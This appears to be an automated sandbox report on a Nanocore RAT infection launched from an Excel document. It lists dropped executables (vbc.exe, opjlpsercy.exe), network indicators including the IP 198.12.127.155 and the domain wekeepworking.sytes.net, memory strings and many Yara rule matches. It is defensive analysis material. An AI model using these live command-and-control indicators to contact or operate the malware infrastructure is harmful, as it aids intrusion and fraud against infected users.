Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9675EE9F.emf

Jump to behavior

Source: global traffic

Source: opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: wekeepworking.sytes.net

Source: vbc.exe, 00000005.00000002.2359904698.00000000055C0000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: opjlpsercy.exe, 00000006.00000002.2196235808.0000000002E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: opjlpsercy.exe, 00000006.00000002.2196235808.0000000002E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000000.2138873352.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.2151569123.0000000000409000.00000008.00020000.sdmp, opjlpsercy.exe, 00000006.00000000.2175454732.0000000000409000.00000008.00020000.sdmp, opjlpsercy.exe, 00000007.00000000.2189082624.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000000.2138873352.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.2151569123.0000000000409000.00000008.00020000.sdmp, opjlpsercy.exe, 00000006.00000000.2175454732.0000000000409000.00000008.00020000.sdmp, opjlpsercy.exe, 00000007.00000000.2189082624.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.2159035727.0000000002290000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2358549037.0000000004C80000.00000002.00000001.sdmp, opjlpsercy.exe, 00000006.00000002.2195582210.0000000002260000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: opjlpsercy.exe, 00000006.00000002.2196235808.0000000002E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: opjlpsercy.exe, 00000006.00000002.2196235808.0000000002E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.2159035727.0000000002290000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2358549037.0000000004C80000.00000002.00000001.sdmp, opjlpsercy.exe, 00000006.00000002.2195582210.0000000002260000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: opjlpsercy.exe, 00000006.00000002.2196235808.0000000002E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

Source: vbc.exe, 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207350789.00000000031FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2356794986.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: opjlpsercy.exe PID: 2248, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2808, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2364, type: MEMORY
Source: Yara match	File source: Process Memory Space: opjlpsercy.exe PID: 2236, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.1da0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5620000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c91458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.4430000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5624629.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c91458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c80000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1db1458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.4430000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3173258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3346174.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.43a0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.43a0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33c5116.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3335116.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33c9f42.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.44c0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1da0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5620000.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1db1458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3339f42.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.4430000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3173258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33d6174.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.2359891154.00000000055B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2359835879.0000000005450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2359682562.0000000005070000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2359847913.0000000005460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2360175265.00000000057E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2359928883.00000000055D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2359948690.00000000055E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2359904698.00000000055C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2207350789.00000000031FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2358435982.00000000049D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2360005099.0000000005610000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2360120668.00000000057B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2358503279.0000000004C60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2356794986.00000000033AC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: opjlpsercy.exe PID: 2248, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: opjlpsercy.exe PID: 2248, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 2808, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 2808, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: opjlpsercy.exe PID: 2236, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: opjlpsercy.exe PID: 2236, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.49d0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.1da0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.1da0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.3339f42.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.55e0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.5460000.19.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.5620000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.5610000.24.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.1.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.1.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.5450000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.33d6174.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.opjlpsercy.exe.1c91458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.opjlpsercy.exe.1c91458.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.4430000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.4430000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.5624629.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.55e0000.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.1.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.1.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.21968f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.21968f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.221641c.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.221641c.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.55b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.5610000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.opjlpsercy.exe.1c91458.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.opjlpsercy.exe.1c91458.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.21a7c2c.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.57e0000.31.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.opjlpsercy.exe.1c80000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.opjlpsercy.exe.1c80000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.1.vbc.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.1.vbc.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.221641c.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.1db1458.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.1db1458.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.4430000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.4430000.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.3173258.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.3173258.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.55d0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.opjlpsercy.exe.1c80000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.opjlpsercy.exe.1c80000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.22115c4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.22115c4.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.222265c.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.3346174.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.3346174.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.43a0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.43a0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.43a0000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.43a0000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.57be8a4.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.21a7c2c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.21a7c2c.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.5070000.17.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.222265c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.222265c.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.219b958.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.33c5116.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.opjlpsercy.exe.3335116.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.opjlpsercy.exe.3335116.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.vbc.exe.33c9f42.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.vbc.exe.33c9f42.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
